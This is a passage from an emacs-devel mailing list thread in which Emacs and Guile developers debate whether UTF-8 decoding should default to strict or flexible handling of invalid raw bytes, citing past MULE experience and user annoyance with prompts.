@ 2014-10-11 18:50                                                                 ` Florian Weimer
  1 sibling, 0 replies; 261+ messages in thread
From: Florian Weimer @ 2014-10-11 18:50 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: David Kastrup, Richard Stallman, Andreas Schwab, dmantipov,
	emacs-devel, handa, monnier, Eli Zaretskii, stephen

* Mark H. Weaver:

> David Kastrup <dak@gnu.org> writes:
>> You cannot successfully cater for clueless application programmers.
>
> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.

It doesn't work all that well in practice on systems (like GNU) which
are not predominantly Unicode-based.  Dealing gracefully with invalid
UTF-8 sometimes means producing invalid UTF-8.

For example, a backup program needs to be able to save and restore
files whose name is not encoded in UTF-8.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  7:18                                                                 ` Eli Zaretskii
@ 2014-10-11 23:51                                                                   ` Mark H Weaver
  2014-10-12  1:35                                                                     ` Stephen J. Turnbull
  2014-10-12  5:37                                                                     ` Eli Zaretskii
  2014-10-12  3:24                                                                   ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-11 23:51 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Fri, 10 Oct 2014 21:15:26 -0400
>> From: Richard Stallman <rms@gnu.org>
>> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
>> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
>> 	stephen@xemacs.org
>> 
>>     > They don't HAVE to be treated the same.  We are talking about changes,
>>     > here.
>> 
>>     They will be very deep and invasive changes, because currently the
>>     encoding/decoding routines don't know the purpose of the stuff they
>>     are producing.
>> 
>> No, it's just a matter of setting some parameter to specify a particular
>> decision in decoding or encoding behavior.
>
> Specify, and then drag it all the way down the encoding/decoding
> machinery.

The strictness flag should conceptually be part of the encoding, and
thus associated with the I/O port.  This would obviate the need to
propagate it down through layers of code.

       Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11 23:51                                                                   ` Mark H Weaver
@ 2014-10-12  1:35                                                                     ` Stephen J. Turnbull
  2014-10-12  8:38                                                                       ` David Kastrup
  2014-10-12  5:37                                                                     ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-12  1:35 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii

Mark H Weaver writes:
 > Eli Zaretskii <eliz@gnu.org> writes:

 > > Specify, and then drag it all the way down the encoding/decoding
 > > machinery.
 > 
 > The strictness flag should conceptually be part of the encoding, and
 > thus associated with the I/O port.

This is the way Emacs works already.

However, I think the Python system, where strictness is part of the
I/O port, not the encoding, and the encodings are designed to error
and then hand the invalid raw bytes to the error handler if desired,
is a better API.  I don't know how easy it would be to provide this in
Emacs (XEmacs streams are quite different from Emacs'), but it's
probably not too hard since the rawbytes facility is already present.
It would be nice to extend that to EOL handling as well IMO, but
that's not as big an issue.

 > This would obviate the need to propagate it down through layers of
 > code.

It's not so easy, because the layers of code referred to are not the
encoding/decoding machinery in the sense of the coding system (ISTR
you use "codec", Emacs calls them "coding systems" to be more like ISO
2022 "coding extensions" IIRC).  It's the mechanism for determining
exactly which coding system is to be used, and the difficulties are
really in the area of UI more so than in API.

In Emacs Lisp there's a tradition of embedding parameters which are
normally specified as constants in the name.  (This issue has already
been referred to in different terms.)  So instead of

    ;; these IO functions are all imaginary
    (let ((s (open-file "foo")))
      (set-stream-coding-system s 'utf-8)
      (set-stream-eol s 'unix)                ; EOL is LF
      (set-stream-invalid-coding-handler s 'strict)
      ;; now we can do I/O, signaling errors on invalid coding
      (read-stream-into-buffer s))
    ;; and now we're ready to edit, assuming valid coding!

Emacs does

    (find-file "foo" 'utf-8-unix-strict)  ; or is it utf-8-strict-unix? arghh!

Things are further complicated by the fact that Emacs has an extremely
complex system for specifying the encoding and the newline convention
used, and either or both might be automatically detected.  All of the
parameters can be tweaked at any stage in the specification routines,
and there are about 5 levels of configurability for files
(configuration is done by setting or binding dynamic variables) and
more than one for network and process streams (which are different).
Adding specification of the error handling convention will make the
*user interface* yet more complicated -- and it has to be possible for
all this to be done separately for every stream (you might trust files
on your host but not the network).  And then there's the "auto" coding
system, which guesses the appropriate coding system by analyzing the
input.

I have always thought that the Emacs' developers emphasis on having
Emacs "DWIM" so much in this area is somewhat misplaced[1], but that is
the way things are and have been since the late 1980s (Emacs actually
installed these features in 1998 or so, but there were patches that
were universally used for Asian languages from the late 1980s), and
there will be a lot of resistence from users and developers to any
changes that require them to do things differently.


Footnotes: 
[1]  Historically, these features were developed by Japanese
developers, who have to deal with an insane environment where even
today you will encounter at least 5 major encodings on a daily basis
(cheating a little, since UTF-16 is usually visible only inside MSFT
file formats and in Java programming), and most of those have
innumerable private variants (most large corporations in Japan have
private sets of Chinese characters that are in Unicode but were
historically not in the Japanese national standards).  It's easy to
see why Japanese would want a good guessing facility!  Most of the
rest of us either don't have to deal with it (95% of what we see is in
one particular encoding), or have an extremely difficult problem in
distinguishing the ones common in our environment (is this Latin-1 or
Latin-9? vs. the Japanese case where the bit patterns of the major
encodings are very distinctive).

This is not to say that guessing is a bad idea where it can be done
accurately, just that the Emacs facilities are way too complex for the
benefit they provide over a much simpler system.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  7:18                                                                 ` David Kastrup
@ 2014-10-12  3:22                                                                   ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-12  3:22 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > It will be easy to specify one or the other, so why not make the default
    > be strict, except in the primitives that operate on files?

    Because we had that already.

What exactly did we have already?
Are we talking about the same thing?

    When we lost users in large droves to XEmacs at the time Emacs became
    the loss leader for multibyte encodings by making MULE manadatory, a
    significant number of those users who went were the ones not even using
    non-ASCII locales, and they would purportedly not even have noticed a
    difference with the files they were supposed to be working with.  But in
    practice, files and communications don't pass the purity tests.

I'm talking about the default for encodings that are NOT done for
reading and writing files.  You seem to be talking about files.

    > There are many ways for two different designs to be "similar".  They
    > are also different.  The details are crucial for users' reactions.  I
    > think the people who objected to those behaviors, which involved
    > changing the file contents, might not mind the confirmation much.

    That kind of choice would require the assumption that any file operation
    (and any other encoding/decoding action) is an immediate, direct, and
    obvious consequence of a user interaction with Emacs.

I don't quite follow you.  Could you present a concrete example to show
what you mean?

However, I think I follow part of it.  If a program does explicit
encoding and decoding operations but does them as part of showing text
to the user, it should specify doing them in the same flexible way
used by the usual file operations.

For instance, decoding an email to show to the user should be done the
flexible way.

It won't be hard to change these programs to specify "flexible" for
the decoding if that is not the default for the encoding primitives.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  7:33                                                                 ` Eli Zaretskii
@ 2014-10-12  3:22                                                                   ` Richard Stallman
  2014-10-12  5:22                                                                     ` David Kastrup
  2014-10-12  5:44                                                                     ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-12  3:22 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    >     Originally, Emacs would complain that Latin-1 cannot be used, and
    >     asked the user to select a different encoding.
    > 
    > That is about Latin-1.  What did Emacs do, at that time, with UTF-8?

    The situation I described is with text encodable by UTF-8, but not by
    Latin-1.  So it has no analogue when UTF-8 is used to begin with.

It looks like that past case isn't directly pertinent to this issue,
then.

    What will Emacs do, under this proposal, if the user is asked whether
    to keep the original raw bytes and answers NO?

Abort the operation, I suppose.

    Our experience with such prompts is that they are perceived as
    annoyances, no matter whether they happen at read or at write time.

Maybe so, but how big of an annoyance depends on how often it happens.

Those who are arguing for doing something to avoid propagating raw
bytes might want to implement an optional feature for asking for
confirmation before saving UTF-8 with raw bytes.  Then people could
try enabling that feature and we would see how often we get asked to
confirm.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  7:18                                                                 ` Eli Zaretskii
  2014-10-11 23:51                                                                   ` Mark H Weaver
@ 2014-10-12  3:24                                                                   ` Richard Stallman
  2014-10-12  5:47                                                                     ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-12  3:24 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > No, it's just a matter of setting some parameter to specify a particular
    > decision in decoding or encoding behavior.

    Specify, and then drag it all the way down the encoding/decoding
    machinery.

Could you be more concrete about the problem you are talking about here?

    > It will be easy to specify one or the other, so why not make the default
    > be strict, except in the primitives that operate on files?

    Because I believe this will annoy users and cause a lot of
    complaining.

Would you please describe a concrete scenario in which this might
annoy users?

Assume that any operation which decodes text _for a user to see_
will specify flexible decoding.


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09 17:37                                                           ` Eli Zaretskii
@ 2014-10-12  3:24                                                             ` Richard Stallman
  2014-10-12  5:54                                                               ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-12  3:24 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    The protocols rarely specify encoding, AFAIK.  If they do, we do use
    them, e.g., when decoding an email message that specifies its MIME
    charset.  But that comes _after_ we already have read the mail into a
    buffer in its raw undecoded form.

There is no problem in that case.  You read it with raw-text,
you determine which encoding to decode, then you decode that one.

What is an example of a protocol that doesn't specify an encoding?  We
need to look at some real cases to see what is the right way to handle
them.

When we look at enough cases to see a pattern, then we could come up
with a general rule.x

    And, of course, when you invoke a program locally, there's usually no
    protocol at all involved.

Likewise, we need to look at some real cases.  You can invoke any
program with M-!; I think in that case heuristic decoding is what
users want.  When functions run call-process on specific, what
decoding is really right?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  3:22                                                                   ` Richard Stallman
@ 2014-10-12  5:22                                                                     ` David Kastrup
  2014-10-13  3:09                                                                       ` Richard Stallman
  2014-10-13  3:44                                                                       ` Richard Stallman
  2014-10-12  5:44                                                                     ` Eli Zaretskii
  1 sibling, 2 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-12  5:22 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>     >     Originally, Emacs would complain that Latin-1 cannot be used, and
>     >     asked the user to select a different encoding.
>     > 
>     > That is about Latin-1.  What did Emacs do, at that time, with UTF-8?
>
>     The situation I described is with text encodable by UTF-8, but not by
>     Latin-1.  So it has no analogue when UTF-8 is used to begin with.
>
> It looks like that past case isn't directly pertinent to this issue,
> then.
>
>     What will Emacs do, under this proposal, if the user is asked whether
>     to keep the original raw bytes and answers NO?
>
> Abort the operation, I suppose.

It's going to be a wagonload of fun if I do

emacsclient `git grep -l some-pattern`

in order to edit 30 files and Emacs decides to abort and/or ask each
time a comment contains a stray latin-1 character.

>     Our experience with such prompts is that they are perceived as
>     annoyances, no matter whether they happen at read or at write time.
>
> Maybe so, but how big of an annoyance depends on how often it happens.

The main point is that annoyance does not serve a purpose.  It's like a
secretary who refuses to file letters with spelling errors in them.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11 23:51                                                                   ` Mark H Weaver
  2014-10-12  1:35                                                                     ` Stephen J. Turnbull
@ 2014-10-12  5:37                                                                     ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-12  5:37 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Cc: rms@gnu.org,  dak@gnu.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Sat, 11 Oct 2014 19:51:45 -0400
> 
> Eli Zaretskii <eliz@gnu.org> writes:
> 
> >> No, it's just a matter of setting some parameter to specify a particular
> >> decision in decoding or encoding behavior.
> >
> > Specify, and then drag it all the way down the encoding/decoding
> > machinery.
> 
> The strictness flag should conceptually be part of the encoding, and
> thus associated with the I/O port.  This would obviate the need to
> propagate it down through layers of code.

We are talking about 2 different meanings of "propagate".  I was
talking about the need for the code at all levels to know about this
bit and "handle" it, like we do now with the different kinds of
"source" and "destination" of the encoding/decoding process.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  3:22                                                                   ` Richard Stallman
  2014-10-12  5:22                                                                     ` David Kastrup
@ 2014-10-12  5:44                                                                     ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-12  5:44 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Sat, 11 Oct 2014 23:22:59 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     >     Originally, Emacs would complain that Latin-1 cannot be used, and
>     >     asked the user to select a different encoding.
>     > 
>     > That is about Latin-1.  What did Emacs do, at that time, with UTF-8?
> 
>     The situation I described is with text encodable by UTF-8, but not by
>     Latin-1.  So it has no analogue when UTF-8 is used to begin with.
> 
> It looks like that past case isn't directly pertinent to this issue,
> then.

I think it _is_ pertinent, because it demonstrates how intolerable
Emacs users are to prompts that appear where by their (users')
standards Emacs should simply silently DTRT (for some definition of
"Right").

>     What will Emacs do, under this proposal, if the user is asked whether
>     to keep the original raw bytes and answers NO?
> 
> Abort the operation, I suppose.

Good luck selling this to our users.

>     Our experience with such prompts is that they are perceived as
>     annoyances, no matter whether they happen at read or at write time.
> 
> Maybe so, but how big of an annoyance depends on how often it happens.

Our experience is that it happens "too often".

> Those who are arguing for doing something to avoid propagating raw
> bytes might want to implement an optional feature for asking for
> confirmation before saving UTF-8 with raw bytes.  Then people could
> try enabling that feature and we would see how often we get asked to
> confirm.

Fine by me.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  3:24                                                                   ` Richard Stallman
@ 2014-10-12  5:47                                                                     ` Eli Zaretskii
  2014-10-13  3:07                                                                       ` Richard Stallman
  2014-10-13  3:38                                                                       ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-12  5:47 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Sat, 11 Oct 2014 23:24:03 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     > No, it's just a matter of setting some parameter to specify a particular
>     > decision in decoding or encoding behavior.
> 
>     Specify, and then drag it all the way down the encoding/decoding
>     machinery.
> 
> Could you be more concrete about the problem you are talking about here?

The need to know about the semantics of this parameter all the way
through the multi-layered hierarchy of our encoding/decoding
implementation.

>     > It will be easy to specify one or the other, so why not make the default
>     > be strict, except in the primitives that operate on files?
> 
>     Because I believe this will annoy users and cause a lot of
>     complaining.
> 
> Would you please describe a concrete scenario in which this might
> annoy users?

I already did, at least twice.  I have no more scenarios to
contribute, sorry.

> Assume that any operation which decodes text _for a user to see_
> will specify flexible decoding.

That means almost all of them, more-or-less.  So it goes against what
AFAIU Mark had in mind with "struct UTF-8".



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  3:24                                                             ` Richard Stallman
@ 2014-10-12  5:54                                                               ` Eli Zaretskii
  2014-10-13  3:10                                                                 ` Richard Stallman
  2014-10-13  3:46                                                                 ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-12  5:54 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Sat, 11 Oct 2014 23:24:30 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, stephen@xemacs.org
> 
> What is an example of a protocol that doesn't specify an encoding?

I'm not an expert, so I actually have trouble coming up with protocols
that _do_ specify an encoding.  Maybe someone else could help out.

>     And, of course, when you invoke a program locally, there's usually no
>     protocol at all involved.
> 
> Likewise, we need to look at some real cases.

Not sure what you mean by that.  M-! and M-| is what I had in mind.

> You can invoke any program with M-!; I think in that case heuristic
> decoding is what users want.

But that's about 99.99% of the uses.  So perhaps we are in violent
agreement after all.

> When functions run call-process on specific, what decoding is really
> right?

I don't think there's a way to know that, except in a very few
specific cases (like speller, for example).  We currently use an
encoding derived from the user locale, but that's a heuristics that
has known limitations and known use cases where it simply fails (but
no better guess is available).



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  1:35                                                                     ` Stephen J. Turnbull
@ 2014-10-12  8:38                                                                       ` David Kastrup
  2014-10-12 12:16                                                                         ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-12  8:38 UTC (permalink / raw)
  To: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Mark H Weaver writes:
>  > Eli Zaretskii <eliz@gnu.org> writes:
>
>  > > Specify, and then drag it all the way down the encoding/decoding
>  > > machinery.
>  > 
>  > The strictness flag should conceptually be part of the encoding, and
>  > thus associated with the I/O port.
>
> This is the way Emacs works already.
>
> However, I think the Python system, where strictness is part of the
> I/O port, not the encoding, and the encodings are designed to error
> and then hand the invalid raw bytes to the error handler if desired,
> is a better API.  I don't know how easy it would be to provide this in
> Emacs

Emacs uses CCL programs for encoding/decoding.  It would be a
performance disaster for loading files with binary parts (like
PostScript) to break out of the CCL program for every "invalid raw
byte".

I cannot believe this, really.  We _fought_ all the Emacs 20 encoding
wars decades ago.  It looks like a bunch of armchair strategists trying
to reinvent the wheel but these are actually people fundamentally
involved with the original efforts.  Which makes this doubly as
baffling.

Richard was _part_ of the Emacs 20 efforts and basically the one who
forced the MULE issue, and Stephen was on the XEmacs side which now has
ailed in popularity not least of all because Emacs tends to work better
in practice _now_ regarding the current prevalence of multibyte codings
in spite of XEmacs being earlier in aligning itself internally with
utf-8 (If memory serves me right).

I can understand GUILE developers being unaware of the experience we
gained through all those years.  But I am baffled at those who _led_ the
respective efforts wanting to repeat history, persuaded that everything
will be different next time round.  Actually not even that: it would
appear that our history and experience are not just treated as
irrelevant but rather as non-existent.

This thread is called "Emacs Lisp's future", but we seem determined to
plan this future starting in 1994 rather than 2014.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  8:38                                                                       ` David Kastrup
@ 2014-10-12 12:16                                                                         ` Stephen J. Turnbull
  2014-10-12 12:34                                                                           ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-12 12:16 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup writes:

 > Richard was _part_ of the Emacs 20 efforts and basically the one
 > who forced the MULE issue, and Stephen was on the XEmacs side which
 > now has ailed in popularity not least of all because Emacs tends to
 > work better in practice _now_ regarding the current prevalence of
 > multibyte codings in

FWIW I don't recall it being a big deal, except for the noise you
personally made about rawbytes support for AUCTeX (and correctly so,
although we were unable to anything about it as quickly as we would
have liked).

 > spite of XEmacs being earlier in aligning itself internally with
 > utf-8 (If memory serves me right).

XEmacs introduced Mule earlier, and was the development platform for
"UTF-2000" and later "Chise" XEmacs which did use UTF-8 internally,
but according to Ben who was doing most of the work at that time, that
code was unmaintainable and not adaptable for Windows so was not
adopted in the mainline.  XEmacs still uses Mule code internally.  (It
doesn't really matter except for convenience in the increasingly
important case of Unicode being the external encoding, and potentially
for access to externally developed software such as the UCD and ICU,
or even PEP 393.  The most important convenience is in design: Unicode
has already dealt with most of the interesting issues in character
sets.)

 > I can understand GUILE developers being unaware of the experience
 > we gained through all those years.  But I am baffled at those who
 > _led_ the respective efforts wanting to repeat history,

It's not a question of repeating history.  History cannot be repeated,
because Unicode has won.  Mule is a niche feature, of rapidly
decreasing importance.

And history can't be repeated for another reason.  Guile has no
history of incorporating Mule features, or even Mule-enabling
features.  The question is whether Guile should adopt features
designed in the 1990s for the 1990s environment (in *Japan*, the most
snafued charset environment imaginable, I'll remind you) in order to
better support Emacs, or whether Emacs should port existing support to
Guile.

The competition is severe, and there are many very strong alternatives
for the use cases Guile would like to serve: Java, Python, Perl, and
Ruby, and you can add PHP for web applications.  Guile can't afford to
acquire the kind of reputation that PHP had for carelessness in
security matters.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12 12:16                                                                         ` Stephen J. Turnbull
@ 2014-10-12 12:34                                                                           ` David Kastrup
  2014-10-12 14:49                                                                             ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-12 12:34 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> The competition is severe, and there are many very strong alternatives
> for the use cases Guile would like to serve: Java, Python, Perl, and
> Ruby, and you can add PHP for web applications.  Guile can't afford to
> acquire the kind of reputation that PHP had for carelessness in
> security matters.

I don't buy the claims that the ability to faithfully represent
arbitrary input in a consistent and reprodusible manner fully supported
by all internal operations and kept unconfusable with other characters
equals "carelessness in security".

In fact, not being able to even _look_ at such material or have a
representation for it seems like a much more severe shortcoming.

Now you claim that you want such support but only if very explicitly
requested, making it a second-class citizen.

This set of priorities has left XEmacs without a round-trippable UTF-8
representation even to date.  I've also already given an example of
GUILE code that is unable to losslessly pass a string through a string
port (the standard mechanism for _accumulating_ a string).  Again, this
is an outcome of the "let's cater primarily for good encodings"
philosophy that is at the bottom of _many_ security problems.  And of
course a perfect vector for denial of service attacks.

An engine that is not able without extra measures to reproduce its input
is not going to win friends.  And it's not like this is an actual
security feature.

What's next?  Text processors that cut off lines after column 80 as a
security feature?  Because people might not see those characters, it is
safer to remove them?

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12 12:34                                                                           ` David Kastrup
@ 2014-10-12 14:49                                                                             ` Stephen J. Turnbull
  2014-10-12 16:50                                                                               ` David Kastrup
                                                                                                 ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-12 14:49 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup writes:

 > I don't buy the claims that the ability to faithfully represent
 > arbitrary input in a consistent and reprodusible manner fully supported
 > by all internal operations and kept unconfusable with other characters
 > equals "carelessness in security".

Good for you!  I wouldn't either -- if any such claim had ever been made.

 > Now you claim that you want such support but only if very explicitly
 > requested,

Yes, that is my own preference.  I could easily be wrong for the
general user, as I've been rolling handlers for broken encoding usage
for 25 years.  However, I've also seen the damage that can be done
when a component of a system makes a virtue of transmitting everything
verbatim, and believe it's best to start secure.

 > making it a second-class citizen.

Non-default is *not* second-class.  And if warranted, defaults can be
changed.  I just prefer starting with safe defaults.  Although you
personally may suffer due to the applications you work on, I suspect
you will be surprised at the lack of outcry if you change the default
judiciously, case by case.

 > I've also already given an example of GUILE code that is unable to
 > losslessly pass a string through a string port (the standard
 > mechanism for _accumulating_ a string).

Presumably improving that situation is precisely why Mark is here.

 > Again, this is an outcome of the "let's cater primarily for good
 > encodings" philosophy that is at the bottom of _many_ security
 > problems.

Sigh.  It is *Emacs* that assumes the world is full of valid data, and
happily shovels any hazmat it receives on to the next user or program
without validation.  And you're right, it *is* a security problem.
Not just denial of service, either.  You say that behavior is what
Emacs users want, and maybe it is.  Because most of the time the data
is "nearly" valid and the defects are "insignificant", and hardly a
security problem.  It's the "worse is better" philosophy.[1]

But the rest of the software development world is going in the
opposite direction.  "In God we trust.  All others, present photo ID."
Maybe they have figured something out?  Heck, even Emacs is moving in
the direction of defending *itself* from invalid data in other ways
(thank you, Ted Z!)

Footnotes: 
[1]  Read Gabriel's essay of that title before taking that as an insult.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12 14:49                                                                             ` Stephen J. Turnbull
@ 2014-10-12 16:50                                                                               ` David Kastrup
  2014-10-13  2:40                                                                                 ` Mark H Weaver
  2014-10-13  3:08                                                                               ` Richard Stallman
  2014-10-13  3:41                                                                               ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-12 16:50 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Sigh.  It is *Emacs* that assumes the world is full of valid data,

Nonsense.  It would not need to _carefully_ _deal_ with data not fitting
an encoding if it assumed that.

It _carefully_ decodes non-representable data into a code page reserved
for non-representable data.  It will deal _properly_ with that data
while it is under control of its strings (not upper/lowercasing it or
mixing it up with other stuff) and will carefully repackage it when
encoding it.

As a consequence, it is easy to apply _any_ strategy to your data.  If
you want to clean out characters that are invalid for your application,
any respective positive or negative character and coding ranges in a
regexp pattern will carefully deal with it.

> and happily shovels any hazmat it receives on to the next user or
> program without validation.

Emacs has no way to know what input is valid for the next user or
program.  An application programmed in Elisp may know, and it has _all_
the tools to deal _gracefully_ with it since Emacs' string processing
will _not_ get confused by data it decoded itself and will preserve all
information.

> And you're right, it *is* a security problem.  Not just denial of
> service, either.  You say that behavior is what Emacs users want, and
> maybe it is.  Because most of the time the data is "nearly" valid and
> the defects are "insignificant", and hardly a security problem.  It's
> the "worse is better" philosophy.[1]

No, it is the "clueless is useless" philosophy.  Don't second-guess
other systems.  Do your job properly, regardless of what is thrown at
you.  Don't be the weakest chain in a link.

Emacs cannot be a verification engine if it has no clue what it should
be verifying.  If you know what you want, you can get it.  Regardless of
what you want.

libunistring (which is what GUILE currently uses for UTF-8 processing)
has a _closed_ set of recovery strategies.  As it stands, it is useless
for implementing Emacs-like behavior because "encode invalid bytes into
something libunistring can deal with transparently" is not part of its
recovery strategies.  Once you _have_ a useful encoding into the space
of properly working strings, _any_ recovery strategy is easy to
implement on top of that.

For a platform, being forced to a closed set of behaviors is an
extremely limiting choice.

> But the rest of the software development world is going in the
> opposite direction.  "In God we trust.  All others, present photo ID."
> Maybe they have figured something out?  Heck, even Emacs is moving in
> the direction of defending *itself* from invalid data in other ways
> (thank you, Ted Z!)

You don't need to defend yourself from something you are equipped to
deal with.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12 16:50                                                                               ` David Kastrup
@ 2014-10-13  2:40                                                                                 ` Mark H Weaver
  2014-10-13  4:49                                                                                   ` Mark H Weaver
  0 siblings, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-13  2:40 UTC (permalink / raw)
  To: David Kastrup; +Cc: Stephen J. Turnbull, emacs-devel

David Kastrup <dak@gnu.org> writes:

> libunistring (which is what GUILE currently uses for UTF-8 processing)
> has a _closed_ set of recovery strategies.  As it stands, it is useless
